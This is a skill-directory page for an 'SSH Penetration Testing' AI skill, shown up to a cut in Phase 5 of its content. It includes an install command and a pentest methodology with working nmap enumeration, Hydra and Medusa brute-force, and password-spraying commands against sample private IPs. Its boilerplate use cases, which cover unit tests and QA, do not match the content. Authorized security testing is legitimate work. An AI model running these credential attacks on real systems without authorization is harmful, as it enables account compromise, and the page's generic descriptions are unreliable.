Z
zebbern
@mayurrathi
⭐ 40.7k GitHub stars

Ssh Penetration Testing

Ssh Penetration Testing is an code AI skill with a core value of This skill should be used when the user asks to \"pentest SSH services\", \"enumerate SSH configurations\", \"brute force SSH credentials\", \"exploit SSH vulnerabilities\", \"perform SSH tu. It helps developers solve real-world problems in the code domain, boosting efficiency, automating repetitive tasks, and optimizing workflows.

This skill should be used when the user asks to \"pentest SSH services\", \"enumerate SSH configurations\", \"brute force SSH credentials\", \"exploit SSH vulnerabilities\", \"perform SSH tu...

Last verified on: 2026-07-07

Quick Facts

Category code
Works With Claude
Source sickn33/antigravity-awesome-skills
Stars ⭐ 40.7k
Last Verified 2026-07-07
Risk Level High
mkdir -p ./skills/ssh-penetration-testing && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/ssh-penetration-testing/SKILL.md -o ./skills/ssh-penetration-testing/SKILL.md

Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).

Skill Content

# SSH Penetration Testing


Purpose


Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.


Prerequisites


Required Tools

- Nmap with SSH scripts

- Hydra or Medusa for brute-forcing

- ssh-audit for configuration analysis

- Metasploit Framework

- Python with Paramiko library


Required Knowledge

- SSH protocol fundamentals

- Public/private key authentication

- Port forwarding concepts

- Linux command-line proficiency


Outputs and Deliverables


1. **SSH Enumeration Report** - Versions, algorithms, configurations

2. **Credential Assessment** - Weak passwords, default credentials

3. **Vulnerability Assessment** - Known CVEs, misconfigurations

4. **Tunnel Documentation** - Port forwarding configurations


Core Workflow


Phase 1: SSH Service Discovery


Identify SSH services on target networks:


bash
# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open

# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100

# Full port scan for SSH
nmap -p- --open 192.168.1.100 | grep -i ssh

# Service version detection
nmap -sV -p 22 192.168.1.100

Phase 2: SSH Enumeration


Gather detailed information about SSH services:


bash
# Banner grabbing
nc 192.168.1.100 22
# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5

# Telnet banner grab
telnet 192.168.1.100 22

# Nmap version detection with scripts
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100

# Enumerate supported algorithms
nmap -p 22 --script ssh2-enum-algos 192.168.1.100

# Get host keys
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100

# Check authentication methods
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100

Phase 3: SSH Configuration Auditing


Identify weak configurations:


bash
# ssh-audit - comprehensive SSH audit
ssh-audit 192.168.1.100

# ssh-audit with specific port
ssh-audit -p 2222 192.168.1.100

# Output includes:
# - Algorithm recommendations
# - Security vulnerabilities
# - Hardening suggestions

Key configuration weaknesses to identify:

- Weak key exchange algorithms (diffie-hellman-group1-sha1)

- Weak ciphers (arcfour, 3des-cbc)

- Weak MACs (hmac-md5, hmac-sha1-96)

- Deprecated protocol versions


Phase 4: Credential Attacks


#### Brute-Force with Hydra


bash
# Single username, password list
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# Username list, single password
hydra -L users.txt -p Password123 ssh://192.168.1.100

# Username and password lists
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# With specific port
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

# Rate limiting evasion (slow)
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100

# Verbose output
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100

# Exit on first success
hydra -l admin -P passwords.txt -f ssh://192.168.1.100

#### Brute-Force with Medusa


bash
# Basic brute-force
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# Multiple targets
medusa -H targets.txt -u admin -P passwords.txt -M ssh

# With username list
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# Specific port
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222

#### Password Spraying


bash
# Test common password across users
hydra -L users.txt -p Summer2024! ssh://192.168.1.100

# Multiple common passwords
for pass in "Password123" "Welcome1" "Summer2024!"; do
    hydra -L users.txt -p "$pass" ssh://192.168.1.100
done

Phase 5: Key-Based Authentication Testing


Test for weak or exposed keys:


bash
# Attempt login with found private key
ssh -i id_rsa user@192.168.1.100

# Specify key explicitly (bypass agent)
ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100

# Force password authentic

🎯 Best For

  • QA engineers
  • Developers writing unit tests
  • Claude users
  • Software engineers
  • Development teams

💡 Use Cases

  • Generating test cases for edge conditions
  • Writing integration test suites
  • Code quality improvement
  • Best practice enforcement

📖 How to Use This Skill

  1. 1

    Install the Skill

    Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.

  2. 2

    Load into Your AI Assistant

    Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.

  3. 3

    Apply Ssh Penetration Testing to Your Work

    Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.

  4. 4

    Review and Refine

    Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.

❓ Frequently Asked Questions

Does this generate test mocks?

Many testing skills include mock generation. Check the install command and skill content for details.

Is Ssh Penetration Testing compatible with Cursor and VS Code?

Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.

Do I need specific dependencies for Ssh Penetration Testing?

Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.

How do I install Ssh Penetration Testing?

Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/ssh-penetration-testing/SKILL.md, ready to use.

Can I customize this skill for my team?

Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.

⚠️ Common Mistakes to Avoid

Not testing edge cases

AI tends to generate happy-path tests. Manually review for boundary conditions.

Skipping validation

Always test AI-generated code changes, even for simple refactors.

Missing dependency updates

Check if the skill requires updated dependencies or new packages.

🔗 Related Skills